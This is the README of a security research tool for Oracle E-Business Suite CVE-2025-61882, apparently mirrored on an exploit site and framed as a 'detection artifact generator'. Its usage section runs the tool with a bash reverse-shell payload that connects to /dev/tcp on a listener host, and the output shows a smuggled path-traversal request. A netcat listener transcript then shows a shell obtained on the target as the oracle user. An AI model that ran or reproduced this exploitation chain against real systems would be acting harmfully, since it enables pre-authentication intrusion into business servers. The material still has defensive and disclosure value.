Share
## https://sploitus.com/exploit?id=5DAA93ED-8EF1-51A6-A17E-16ADF4385111
# watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882




Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882

See our [blog post](https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/) for technical details

# Detection in Action

```
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(   \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

        (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator

          - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-61882]

[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -

```
Listener
```
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
```

# Description

This script attempts to detect if Oracle E-Business Suite is vulnerable to CVE-2025-61882

# Affected Versions

Oracle E-Business Suite, versions 12.2.3-12.2.14

For more information visit [Oracle Security Alert Advisory - CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber